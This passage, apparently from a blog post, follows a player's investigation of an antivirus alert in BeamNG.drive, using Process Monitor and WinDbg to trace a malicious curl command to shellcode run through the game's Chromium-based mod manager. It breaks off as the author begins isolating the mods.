I Found Malware in a BeamNG Mod

Summary

WARNING: This post contains snippets of code from real malware. Do not run any of the code in this post outside of a secure, isolated virtual machine. Last week, I fired up BeamNG.drive hoping to enjoy a ride around Belasco City. But, just after I launched the game, I noticed an odd notification from my antivirus software. curl.exe? That can’t be good. Cloudflare Radar confirmed the domain curl tried to access is known to be malicious. At this point, however, I wasn’t 100% sure this came from the game. Starting the investigation To find out if the problem was indeed in the game, I re-launched it with Process Monitor running. Filtering through the events, my suspicion was confirmed: a process launching cmd with a curl command was spawned by the game. But where exactly was this command coming from? Was it a mod, or was the game itself compromised? Inspecting the call stack in Process Monitor shows the command was executed by calling WinExec, a legacy function from 16-bit Windows that is commonly used in shellcode malware. To take a closer look, I attached the WinDbg debugger to the game process and set a breakpoint on WinExec. When the malicious code tries to run the command, the debugger will pause the process and allow me to inspect the call stack and memory. That breakpoint was hit at the exact moment I opened the in-game mod manager. WinDbg shows which memory address WinExec was called at, and we can use that to find the shellcode that executed the command. But how did this shellcode even get there in the first place? Unfortunately, the call stack doesn’t show us which file it came from, but it does contain another clue: libcef. This refers to the Chromium Embedded Framework, which suggests a vulnerability in Chromium might have been exploited to insert the shellcode into memory. BeamNG.drive uses Chromium to render parts of the UI, including the mod manager where the malicious code was executed. I disabled all my downloaded mods and dug deeper. The mod I had a fe...